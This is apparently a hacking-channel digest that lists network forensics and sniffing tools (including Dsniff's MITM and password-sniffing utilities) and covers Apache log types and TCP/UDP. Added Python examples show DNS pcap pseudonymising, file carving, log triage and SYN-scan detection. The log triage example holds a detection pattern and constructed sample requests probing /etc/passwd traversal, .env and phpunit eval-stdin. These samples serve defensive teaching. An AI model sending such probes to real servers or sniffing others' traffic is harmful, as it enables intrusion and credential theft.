UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects & analyzes every new hacking method,
+ AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
CTF Series _ Vulnerable Machines.pdf (attached, 1.6 MB)
The most recommended tutorial, for beginners & experts
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 DNS hacking/debugging utilities (PowerDNS tools) + descriptions:


[dnsgram](https://doc.powerdns.com/md/manpages/dnsgram.1/): dnsgram is a debugging tool for intermittent resolver failures. It takes one or more input PCAP files and generates statistics on 5-second segments, allowing the study of intermittent resolver issues.

dnsreplay: dnsreplay takes recorded questions and answers and replays them to the specified nameserver, reporting afterwards which percentage of answers matched, were worse or were better. It compares the answers and some other metrics from the live nameserver with those found in the dump file.

[dnsscope](https://doc.powerdns.com/md/manpages/dnsscope.1/): dnsscope takes an input PCAP, generates some simple statistics and outputs them to the console.

dnswasher: dnswasher takes an input file in PCAP format and writes out a PCAP file, while obfuscating end-user IP addresses. This is useful to share data with third parties while attempting to protect the privacy of your users. Check the output before sharing it: the tool rewrites IP addresses, not the DNS payload, so every queried name survives and can identify users on its own.

ENJOY❤️👍🏻
✅ git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
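The following is an added example written for this page, not code from PowerDNS: a small dnswasher-style pseudonymiser in pure Python. It rewrites the client side of every IPv4/UDP DNS packet in a pcap to a stable pseudonym, recomputes the IPv4 header checksum, and copies the DNS payload untouched, which is exactly why query names survive washing. The 10.0.0.N numbering, the sample capture and the "drop the UDP checksum" choice are this example's own assumptions, not a description of how dnswasher itself works.

```python
"""dnswasher-style pseudonymiser for DNS client addresses in a pcap (added example, pure stdlib)."""
import socket
import struct
from typing import Dict, List, Tuple

PCAP_MAGIC = 0xA1B2C3D4                  # little-endian pcap with microsecond timestamps
GLOBAL_HDR = struct.Struct("<IHHiIII")   # magic, major, minor, thiszone, sigfigs, snaplen, linktype
PKT_HDR = struct.Struct("<IIII")         # ts_sec, ts_usec, incl_len, orig_len
LINKTYPE_ETHERNET = 1
ETH_LEN, ETHERTYPE_IPV4, PROTO_UDP, DNS_PORT = 14, 0x0800, 17, 53
Frame = Tuple[int, int, bytes]           # (ts_sec, ts_usec, raw Ethernet frame)


def ip_checksum(hdr: bytes) -> int:
    """RFC 1071 one's-complement sum; yields 0 when run over a header whose checksum field is correct."""
    if len(hdr) % 2:
        hdr += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def read_pcap(data: bytes) -> List[Frame]:
    magic, _maj, _min, _tz, _sig, _snap, linktype = GLOBAL_HDR.unpack_from(data, 0)
    if magic != PCAP_MAGIC or linktype != LINKTYPE_ETHERNET:
        raise ValueError("expected a little-endian pcap with Ethernet link type")
    frames, off = [], GLOBAL_HDR.size
    while off + PKT_HDR.size <= len(data):
        ts_sec, ts_usec, incl, _orig = PKT_HDR.unpack_from(data, off)
        off += PKT_HDR.size
        frames.append((ts_sec, ts_usec, data[off:off + incl]))
        off += incl
    return frames


def write_pcap(frames: List[Frame]) -> bytes:
    out = [GLOBAL_HDR.pack(PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for ts_sec, ts_usec, frame in frames:
        out.append(PKT_HDR.pack(ts_sec, ts_usec, len(frame), len(frame)) + frame)
    return b"".join(out)


def src_dst(frame: bytes) -> Tuple[str, str]:
    """Dotted-quad source and destination of an Ethernet/IPv4 frame."""
    ip = frame[ETH_LEN:]
    return socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])


def wash(data: bytes, pseudo_prefix: str = "10.0.0.") -> Tuple[bytes, Dict[str, str]]:
    """Rewrite the client side of every IPv4/UDP DNS packet to a stable pseudonym (pseudo_prefix + N is
    this example's own numbering, not dnswasher's). Returns the washed pcap and the real->pseudonym
    table, which is the re-identification key and must stay with the original capture."""
    table: Dict[str, str] = {}

    def pseudonym(addr: str) -> str:
        return table.setdefault(addr, pseudo_prefix + str(len(table) + 1))

    washed: List[Frame] = []
    for ts_sec, ts_usec, frame in read_pcap(data):
        if len(frame) < ETH_LEN + 28 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            washed.append((ts_sec, ts_usec, frame))       # non-IPv4 frames are copied unchanged
            continue
        ihl = (frame[ETH_LEN] & 0x0F) * 4
        ip = bytearray(frame[ETH_LEN:ETH_LEN + ihl])
        rest = bytearray(frame[ETH_LEN + ihl:])           # UDP header + DNS message, copied verbatim
        if ip[9] == PROTO_UDP:
            sport, dport = struct.unpack("!HH", rest[:4])
            src, dst = src_dst(frame)
            if dport == DNS_PORT:                         # query: the client is the source
                ip[12:16] = socket.inet_aton(pseudonym(src))
            if sport == DNS_PORT:                         # answer: the client is the destination
                ip[16:20] = socket.inet_aton(pseudonym(dst))
            rest[6:8] = b"\x00\x00"                       # UDP checksum covered the old addresses; 0 = absent
        ip[10:12] = b"\x00\x00"
        ip[10:12] = struct.pack("!H", ip_checksum(bytes(ip)))
        washed.append((ts_sec, ts_usec, frame[:ETH_LEN] + bytes(ip) + bytes(rest)))
    return write_pcap(washed), table


def build_dns_frame(src: str, dst: str, sport: int, dport: int, dns: bytes) -> bytes:
    """Ethernet/IPv4/UDP frame around a DNS message (constructed sample traffic, not a real capture)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(dns), 0) + dns
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x1234, 0x4000, 64, PROTO_UDP, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return b"\x02" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip + udp


def sample_pcap() -> bytes:
    """Constructed capture: two clients query a resolver for example.com; the first one gets an answer."""
    query = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" + b"\x07example\x03com\x00\x00\x01\x00\x01"
    answer = b"\x12\x34\x81\x80" + query[4:]              # QR/RD/RA set, question echoed, no RRs
    return write_pcap([
        (1000, 0, build_dns_frame("192.0.2.10", "198.51.100.53", 40001, DNS_PORT, query)),
        (1000, 500, build_dns_frame("198.51.100.53", "192.0.2.10", DNS_PORT, 40001, answer)),
        (1003, 0, build_dns_frame("192.0.2.77", "198.51.100.53", 40002, DNS_PORT, query)),
    ])


if __name__ == "__main__":
    out, key = wash(sample_pcap())
    print([src_dst(f) for _, _, f in read_pcap(out)], key)
```

Run it as a script to print the washed endpoints and the pseudonym table. The table is the re-identification key, so it belongs with the original capture, never with the shared copy; and because the DNS message is copied byte for byte, review (or scrub) the query names before a washed file leaves your hands.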
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 File extraction / dumping tools + descriptions


[Chaosreader](https://github.com/brendangregg/Chaosreader): A freeware tool to trace TCP/UDP/... sessions and fetch application data from snoop or tcpdump logs. This is a type of "any-snarf" program: it will fetch telnet sessions, FTP files, HTTP transfers (HTML, GIF, JPEG, ...), SMTP emails, ... from the captured data inside network traffic logs. An HTML index file is created that links to all the session details, including real-time replay programs for telnet, rlogin, IRC, X11 and VNC sessions, and reports such as image reports and HTTP GET/POST content reports.

Dsniff: Dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g., due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

[Foremost](http://foremost.sourceforge.net/): Foremost is a console program to recover files based on their headers, footers and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc., or directly on a drive. The headers and footers can be specified in a configuration file, or you can use command-line switches to select built-in file types. The built-in types look at the data structures of a given file format, allowing for a more reliable and faster recovery.

Justniffer: Justniffer is a network protocol analyzer that captures network traffic and produces logs in a customizable way; it can emulate Apache web server log files, track response times and extract all "intercepted" files from HTTP traffic.

[NetworkMiner](http://www.netresec.com/?page=NetworkMiner): NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/ reassemble transmitted files and certificates from PCAP files.

pcapfex: Packet CAPture Forensic Evidence eXtractor (pcapfex) is a tool that finds and extracts files from packet capture files. Its power lies in its ease of use: just provide it a pcap file and it will try to extract all of the files. It is an extensible platform, so additional file types to recognize and extract can be added easily.


[Snort](http://www.snort.org/): Snort is an open source network intrusion prevention and detection system (IDS/IPS), developed by Sourcefire and now owned by Cisco. Combining the benefits of signature-, protocol- and anomaly-based inspection, Snort is, by its own account, the most widely deployed IDS/IPS technology worldwide.

Tcpick: Tcpick is a text-mode, libpcap-based sniffer that can track, reassemble and reorder TCP streams. It can save the captured flows to separate files or display them in the terminal, which makes it useful for sniffing files transmitted via FTP or HTTP. When a connection is closed it can display the whole stream in the terminal in different display modes: hexdump, hexdump + ASCII, only printable characters, raw mode and so on.

ENJOY❤️👍🏻
✅ git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
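Foremost's description above draws a line between carving by header/footer and carving by a format's internal data structures. The block below is an added example written for this page (not foremost's code) that shows both on a constructed "disk image": a JPEG is carved the simple way, first FF D9 footer after the FF D8 FF header with a size cap, while a PNG is carved by walking its length-prefixed, CRC-protected chunks until IEND, which also lets the carver reject a PNG signature whose chunks do not check out. The signature table, the size cap and the sample bytes are this example's own choices.

```python
"""Header/footer versus structure-aware file carving (added example, not foremost's code)."""
import struct
import zlib
from typing import Callable, Dict, List, Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def walk_png(blob: bytes, start: int) -> Optional[int]:
    """End offset of the PNG at `start`, or None if a chunk is truncated or its CRC fails."""
    off = start + len(PNG_SIG)
    while off + 12 <= len(blob):
        length, ctype = struct.unpack("!I4s", blob[off:off + 8])
        data = blob[off + 8:off + 8 + length]
        crc = blob[off + 8 + length:off + 12 + length]
        if len(data) != length or len(crc) != 4:
            return None                                   # runs off the end: truncated file
        if struct.unpack("!I", crc)[0] != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            return None                                   # bad CRC: not a real chunk, so not a real PNG
        off += 12 + length
        if ctype == b"IEND":
            return off
    return None


Parser = Callable[[bytes, int], Optional[int]]
# name -> (header, footer, structural parser); a footer-only entry is what a foremost.conf line gives you.
SIGNATURES: Dict[str, Tuple[bytes, Optional[bytes], Optional[Parser]]] = {
    "png": (PNG_SIG, None, walk_png),
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", None),
}


def carve(blob: bytes, max_size: int = 8 * 1024 * 1024) -> List[Tuple[str, int, bytes]]:
    """Scan `blob` (an image or unallocated space) and return (type, offset, bytes) per file found."""
    found: List[Tuple[str, int, bytes]] = []
    pos = 0
    while pos < len(blob):
        best = None                                       # earliest header of any type from `pos`
        for name, (header, footer, parser) in SIGNATURES.items():
            i = blob.find(header, pos)
            if i != -1 and (best is None or i < best[0]):
                best = (i, name, header, footer, parser)
        if best is None:
            break
        start, name, header, footer, parser = best
        if parser is not None:
            end = parser(blob, start)
        else:                                             # footer search capped like foremost's size field; an
            f = blob.find(footer, start + len(header), start + max_size)  # embedded thumbnail's own FF D9
            end = None if f == -1 else f + len(footer)    # would truncate a JPEG here, the classic pitfall
        if end is None:
            pos = start + 1                               # false positive or truncated: step past the header
            continue
        found.append((name, start, blob[start:end]))
        pos = end
    return found


def make_png() -> bytes:
    """Constructed 1x1 red RGB PNG built chunk by chunk (sample data, not a captured file)."""
    def chunk(ctype: bytes, data: bytes) -> bytes:
        return struct.pack("!I", len(data)) + ctype + data + struct.pack("!I", zlib.crc32(ctype + data) & 0xFFFFFFFF)
    ihdr = struct.pack("!IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, depth, colour type, ..., interlace
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00")) + chunk(b"IEND", b"")


def make_jpeg() -> bytes:
    """Constructed minimal JFIF header plus EOI marker; enough for a header/footer carver."""
    return b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\xff\xd9"


def sample_image() -> Tuple[bytes, Dict[str, bytes]]:
    """Filler, a PNG, filler, a PNG signature with a broken chunk, filler, a JPEG, filler."""
    filler = bytes(range(256))                            # contains none of the signatures above
    broken = PNG_SIG + struct.pack("!I4s", 13, b"IHDR") + b"\x00" * 4   # chunk cut off mid-way
    png, jpg = make_png(), make_jpeg()
    return filler + png + filler + broken + filler + jpg + filler, {"png": png, "jpg": jpg}


if __name__ == "__main__":
    blob, _ = sample_image()
    for name, off, data in carve(blob):
        print(f"{name} at offset {off}, {len(data)} bytes")
```

The chunk walk is why structure-aware types are "more reliable and faster": the carver knows exactly where a PNG ends without scanning for a footer, and a signature that is not followed by valid chunks is skipped instead of producing a bogus file that runs to the next FF D9 or end of the image.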
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 AWESOME HACKING PROJECTS:

[BPF for Ultrix](http://www.tcpdump.org/other/bpfext42.tar.Z): A distribution of BPF for Ultrix 4.2, with both source code and binary modules.

BPF+: "Exploiting Global Data-flow Optimization in a Generalized Packet Filter Architecture", by Andrew Begel, Steven McCanne and Susan Graham (paper).

[FFT-FGN-C](http://ita.ee.lbl.gov/html/contrib/fft_fgn_c.html): FFT-FGN-C is a program for synthesizing a type of self-similar process known as fractional Gaussian noise. The program is fast but approximate. Fractional Gaussian noise is only one type of self-similar process; when using this program to synthesize network traffic, keep in mind that the traffic you seek may be better modeled by one of the other processes.

Haka: An open source, security-oriented language for describing protocols and applying security policies to (live) captured traffic. The scope of the Haka language is twofold. First, it allows writing security rules to filter, alter or drop unwanted packets and to log and report malicious activity. Second, Haka features a grammar for specifying network protocols and their underlying state machines.

[RIPE-NCC Hadoop for PCAP](https://github.com/RIPE-NCC/hadoop-pcap): A Hadoop library to read packet capture (PCAP) files. It bundles the code used to read PCAPs and can be used within MapReduce jobs to read PCAP files natively. It also features a Hive Serializer/Deserializer (SerDe) to query PCAPs with SQL-like commands.

Traffic Data Repository at the WIDE Project (paper abstract): It is increasingly important for both network researchers and operators to know the trend of network traffic and to find anomalies in it. The paper describes an ongoing effort within the WIDE project to collect a set of free tools to build a traffic data repository containing detailed information about its backbone traffic. Traffic traces are collected with tcpdump and, after privacy-sensitive information is removed, made open to the public. The authors review the issues around user privacy, then the tools used to build the WIDE traffic repository, and report the current status and findings from the early stage of their IPv6 deployment.

ENJOY❤️👍🏻
✅ git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Random hacking tricks

🦑 Termux-Linux special tool: RTLSDR-Scanner (a desktop GUI; see the tested platforms below)

A cross-platform Python frequency-scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.

In other words, a cheap, simple spectrum analyser.

The scanner attempts to overcome the tuner's frequency response by averaging scans from both the positive and negative frequency offsets of the baseband data.

INSTALLATION & RUN:

1️⃣ git clone https://github.com/EarToEarOak/RTLSDR-Scanner.git

2️⃣ cd RTLSDR-Scanner

3️⃣ Run 'python -m rtlsdr_scanner'.

4️⃣ To start a scan, simply enter the range at the bottom of the window and click 'Start'; after a while a plot of signal strengths should be displayed.

'Dwell' controls how long each step is sampled for, longer times will result in more averaging of the signal.

'Continuous update' updates the display on each step. Caution only use this with small scans and low dwell times, otherwise it will become unresponsive.

'Grid' displays a grid on the scan plot

5️⃣File Menu
Open... - Open a saved scan
Save As... - Save a scan
Export... - Export a scan to a CSV file
Properties ... - Scan information

6️⃣Edit Menu
Preferences - Set dongle gain, calibration, Local Oscillator (positive offset for upconverters) and sample bands (see below)
Scan Menu
Start - Start a scan
Stop - Stop the scan
Stop at end - Stop the scan when the current sweep is finished (only in continuous mode)

7️⃣Tools Menu
Compare - Compare two previously saved scans
Auto Calibration - Perform a crude calibration of the dongle to a known signal (this should be a continuous, unwavering signal)
Tweaking

🦑 Tested on:

Windows 7 (x86 and x64)
Windows 8.1 (x64)
Ubuntu 12.04 (x86)
Ubuntu 12.10 (x64)
Ubuntu 13.04 (x64)
Ubuntu 14.04 (x64)
OS X Snow Leopard
OS X Mountain Lion

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Types of Apache Logs

The different types of Apache logs are controlled by different web server modules, each with its own directives and its own way of specifying the format of a log line.

🦑 The following types of Apache web server logs are available:

Error Log
Per-module logging
Access Log
Additional configurable debug logging
Forensic (forensic logs)
CGI Script Execution Logs

1️⃣ Error Log
The server error log is the most important log file. This is where Apache httpd sends diagnostic information and records any errors it encounters while processing requests. It is the first place to look when there is a problem starting or running the server, as it often contains details about what went wrong and how to fix it.

2️⃣ Per-module logging
The LogLevel directive allows you to specify the log severity level per module. So if you are troubleshooting one specific module, you can raise its log level without receiving unnecessary information about other modules that do not interest you. This is especially useful for modules like mod_proxy or mod_rewrite, where you want to know the details of what the module is trying to do.

3️⃣ Access Log
The server access log records all requests processed by the server.

4️⃣ Additional configurable debug logging
The LogMessage directive (mod_log_debug) causes a custom message to be logged to the error log. The message can use variables and functions from the ap_expr syntax. References to HTTP headers in the expression do not cause those header names to be added to the Vary header. The messages are logged at log level info.

5️⃣ Forensic (forensic logs)
mod_log_forensic logs each request before and after it is processed, so the forensic log contains two lines per request: a '+' line with the request id, the request line and the headers before processing, and a '-' line with the same id once the request has been handled. A request whose '-' line never appears is one the server did not finish, which is what the module is for.

6️⃣ CGI Script Execution Logs
If ScriptLog is not set, no script log is created. If ScriptLog is set, any CGI errors are logged to the file given as its argument. The directive is meant for debugging, not for production servers.

written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
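As an added example written for this page (not code from the Apache project), here is what an investigator typically does with two of the log types above: parse combined-format access lines and pick out clients that look like scanners, and pair the '+id' / '-id' lines of a forensic log to find requests the server never finished (the check the module's bundled check_forensic script performs). The regex follows the standard "combined" LogFormat; the suspicious-path patterns and the 404 threshold are illustrative assumptions to tune per site; the forensic line shape follows the mod_log_forensic documentation, but the ids and every sample line are constructed.

```python
"""Apache access-log and forensic-log triage (added example; constructed sample lines)."""
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

# LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
COMBINED = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Path fragments that are almost always scanner or exploit noise (assumption: illustrative, tune per app).
SUSPICIOUS = re.compile(r"(\.\./|/etc/passwd|%27|union\s+select|\bphpunit\b|\.env\b)", re.IGNORECASE)


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Fields of one combined-format line, plus method/path split out of %r; None if it does not parse."""
    m = COMBINED.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0] if parts else ""
    rec["path"] = parts[1] if len(parts) > 1 else ""
    return rec


def scanner_candidates(lines: Iterable[str], min_404: int = 3) -> Dict[str, Dict[str, int]]:
    """Per client: count of 404s and of requests matching SUSPICIOUS; keep clients over either threshold."""
    stats: Dict[str, Counter] = defaultdict(Counter)
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue                                      # unparseable line: count it elsewhere, not here
        if rec["status"] == "404":
            stats[rec["host"]]["not_found"] += 1
        if SUSPICIOUS.search(rec["path"]):
            stats[rec["host"]]["suspicious"] += 1
    return {h: dict(c) for h, c in stats.items() if c["not_found"] >= min_404 or c["suspicious"]}


def unfinished_requests(forensic_lines: Iterable[str]) -> List[Tuple[str, str]]:
    """mod_log_forensic writes '+<id>|<request line>|<header>|...' before handling a request and '-<id>'
    after it. An id that never gets its '-' line is a request the server did not finish (crash, hang, kill)."""
    pending: Dict[str, str] = {}
    for line in forensic_lines:
        line = line.rstrip("\n")
        if line.startswith("+"):
            rid, request = line[1:].split("|", 2)[:2]
            pending[rid] = request
        elif line.startswith("-"):
            pending.pop(line[1:], None)
    return sorted(pending.items())


# Constructed sample lines (not real traffic); the forensic ids are made up but follow the documented shape.
ACCESS_LOG = [
    '198.51.100.4 - - [10/Jul/2020:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Jul/2020:12:00:02 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Jul/2020:12:00:02 +0000] "GET /.env HTTP/1.1" 404 196 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Jul/2020:12:00:03 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Jul/2020:12:00:03 +0000] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 400 226 "-" "curl/7.68.0"',
    '198.51.100.4 - - [10/Jul/2020:12:00:05 +0000] "POST /login HTTP/1.1" 302 - "https://example.test/" "Mozilla/5.0"',
    'this line is not in combined format',
]
FORENSIC_LOG = [
    "+aB3xQ9mcAAAAC|GET /index.html HTTP/1.1|Host:example.test|User-Agent:Mozilla/5.0",
    "-aB3xQ9mcAAAAC",
    "+aB3xQ9mdAAAAD|POST /upload HTTP/1.1|Host:example.test|Content-Length:104857600",
    "+aB3xQ9meAAAAE|GET /healthz HTTP/1.1|Host:example.test",
    "-aB3xQ9meAAAAE",
]

if __name__ == "__main__":
    print(scanner_candidates(ACCESS_LOG))
    print(unfinished_requests(FORENSIC_LOG))
```

Two practical notes: the access log only tells you what completed, so a request that crashed a worker is visible in the forensic log and nowhere else; and the forensic log records full request headers, so it needs the same access controls as any other file holding cookies and Authorization headers.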
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 British police arrest 746 criminals after cracking encrypted information on EncroChat
#News

> The National Crime Agency (NCA) announced that 746 people have been arrested after the information on EncroChat was intercepted and decrypted. According to the NCA, some iconic criminal leaders are among those arrested. So far the operation has seized a total of £54 million, 77 firearms, two tonnes of drugs, 55 high-value cars and 73 luxury watches.

> The arrests, under the NCA's Operation Venetic, became possible after European partners made a breakthrough against the encrypted messaging platform EncroChat. Since 2016 the NCA has been working with other law enforcement agencies around the world to crack the application's encryption. Two months ago its partners in France and the Netherlands successfully infiltrated the platform and passed the discovered information to Europol. Thanks to this breakthrough, European law enforcement agencies also targeted criminals in their respective countries.

> According to the NCA, EncroChat was operated by criminals outside the UK, which made getting started harder. The NCA said the people behind EncroChat realised the application was compromised on June 13 and warned users to throw away their phones to reduce the chance of arrest.

> The EncroChat application usually ran on specially modified smartphones that cost about £1,500 for a six-month contract. The handsets carried an instant messaging application, could make VoIP calls and offered remote data self-destruction. Since the messages had already been intercepted, that wipe feature could no longer help the users of these devices.

#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The question may arise: why is such an unreliable protocol as UDP needed if the reliable TCP exists?
#FastTips

> The price of TCP's reliability is what accountants call "overhead": to control packet delivery, TCP sends a lot of data that carries no useful information and only serves to establish and manage the connection. For example, before even one packet with useful data can be sent over TCP, a three-way handshake must complete: the source sends one special packet (SYN), the destination answers with one packet saying the connection can be established (SYN-ACK), and the source sends one more special packet confirming it (ACK).

> For this reason both TCP and UDP are "good"; what matters is using them correctly. For example, when streaming video it does not matter which packet was lost a second or two ago. But when opening a web page, where incomplete data may break processing of the HTTP request, you need, on the contrary, to monitor the delivery and integrity of every data packet.

> A detailed understanding of TCP and UDP matters when:

1) analysing network traffic

2) configuring an iptables firewall

3) understanding and protecting against certain kinds of DoS attack.

> For example, understanding the TCP connection mechanism lets you configure iptables so that all new connections are refused while existing ones are preserved, or forbid any incoming connections while fully allowing outgoing ones; it also lets you understand and prevent a number of DoS attacks, and understand SYN and other scan types: why they are possible and how they work.

written by undercode
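The iptables policies described above only work because the firewall tracks the handshake state of every TCP flow. The block below is an added example written for this page (not Linux kernel or netfilter code): a miniature connection tracker in the spirit of conntrack and `-m conntrack --ctstate`. It replays a constructed packet list, labels each packet NEW / ESTABLISHED / INVALID the way a stateful firewall would, applies the "established in, anything out, new only on listed ports" policy, and flags hosts whose handshakes never complete, which is what a SYN scan looks like on the wire. The addresses, ports and the packet trace are constructed; the tracker also simplifies by creating entries even for packets the policy drops.

```python
"""Miniature TCP connection tracker, stateful policy and SYN-scan detector (added example)."""
from collections import Counter
from typing import Dict, List, Set, Tuple

FIN, SYN, RST, ACK = 0x01, 0x02, 0x04, 0x10                # TCP flag bits
Packet = Tuple[str, int, str, int, int, int]                # src, sport, dst, dport, flags, payload bytes
Flow = Tuple[str, int, str, int]                            # client, cport, server, sport (as first seen)


def track(packets: List[Packet]) -> Tuple[Dict[Flow, str], List[str]]:
    """Final state per flow plus, per packet, the conntrack-style label (NEW / ESTABLISHED / INVALID)."""
    state: Dict[Flow, str] = {}
    labels: List[str] = []
    for src, sp, dst, dp, flags, _plen in packets:
        fwd, rev = (src, sp, dst, dp), (dst, dp, src, sp)
        if fwd not in state and rev not in state:
            if flags & SYN and not flags & ACK:             # a bare SYN opens a flow: ctstate NEW
                state[fwd] = "SYN_SENT"
                labels.append("NEW")
            else:
                labels.append("INVALID")                    # mid-stream packet for a flow never seen
            continue
        key, from_client = (fwd, True) if fwd in state else (rev, False)
        s = state[key]
        labels.append("NEW" if s == "SYN_SENT" and from_client else "ESTABLISHED")
        if flags & RST:
            state[key] = "RESET"
        elif s == "SYN_SENT" and not from_client and flags & SYN and flags & ACK:
            state[key] = "SYN_RECV"                         # server replied: both directions seen
        elif s == "SYN_RECV" and from_client and flags & ACK and not flags & SYN:
            state[key] = "ESTABLISHED"                      # third packet; only now can payload flow
        elif s == "ESTABLISHED" and flags & FIN:
            state[key] = "CLOSING"
    return state, labels


def firewall(packets: List[Packet], protected: str, open_ports: Set[int]) -> List[Tuple[int, str]]:
    """Verdict for every packet addressed to `protected`: ESTABLISHED is accepted, NEW only on open_ports,
    INVALID never. In iptables terms:
      iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
      iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT
      iptables -A INPUT -j DROP"""
    _, labels = track(packets)
    verdicts = []
    for i, ((_src, _sp, dst, dp, _fl, _n), label) in enumerate(zip(packets, labels)):
        if dst != protected:
            continue
        ok = label == "ESTABLISHED" or (label == "NEW" and dp in open_ports)
        verdicts.append((i, "ACCEPT" if ok else "DROP"))
    return verdicts


def syn_scan_sources(packets: List[Packet], min_flows: int = 3) -> List[str]:
    """Clients with at least `min_flows` flows that never reached ESTABLISHED: half-open probing."""
    state, _ = track(packets)
    incomplete = Counter(client for (client, _cp, _srv, _sp), s in state.items()
                         if s not in ("ESTABLISHED", "CLOSING"))
    return sorted(c for c, n in incomplete.items() if n >= min_flows)


def sample_packets() -> List[Packet]:
    """Constructed trace: one real HTTP session, a four-port half-open scan, and a stray ACK."""
    c, s, x = "192.0.2.10", "198.51.100.7", "203.0.113.5"   # client, server, scanner
    return [
        (c, 40001, s, 80, SYN, 0), (s, 80, c, 40001, SYN | ACK, 0), (c, 40001, s, 80, ACK, 0),
        (c, 40001, s, 80, ACK, 120),                        # first payload byte after three empty packets
        (s, 80, c, 40001, ACK, 500),
        (x, 50001, s, 22, SYN, 0), (s, 22, x, 50001, RST | ACK, 0),                        # closed port
        (x, 50002, s, 80, SYN, 0), (s, 80, x, 50002, SYN | ACK, 0), (x, 50002, s, 80, RST, 0),   # open
        (x, 50003, s, 443, SYN, 0), (s, 443, x, 50003, SYN | ACK, 0), (x, 50003, s, 443, RST, 0),
        (x, 50004, s, 8080, SYN, 0),                        # filtered: no answer at all
        ("198.51.100.99", 5555, s, 80, ACK, 40),            # no handshake seen: INVALID
    ]


if __name__ == "__main__":
    pkts = sample_packets()
    print(track(pkts)[1])
    print(firewall(pkts, "198.51.100.7", {80, 443}))
    print(syn_scan_sources(pkts))
```

Note what the trace makes visible: three header-only packets go by before the first byte of payload, which is the handshake overhead the text describes; the scanner's flows end in RESET or stay in SYN_SENT and never reach ESTABLISHED, which is the pattern a SYN-scan detector keys on; and the stray ACK is INVALID because no SYN preceded it, so a stateful firewall drops it even though port 80 is open.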
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Some missed tips in Linux:
#FastTips

1) Unsuccessful distribution base

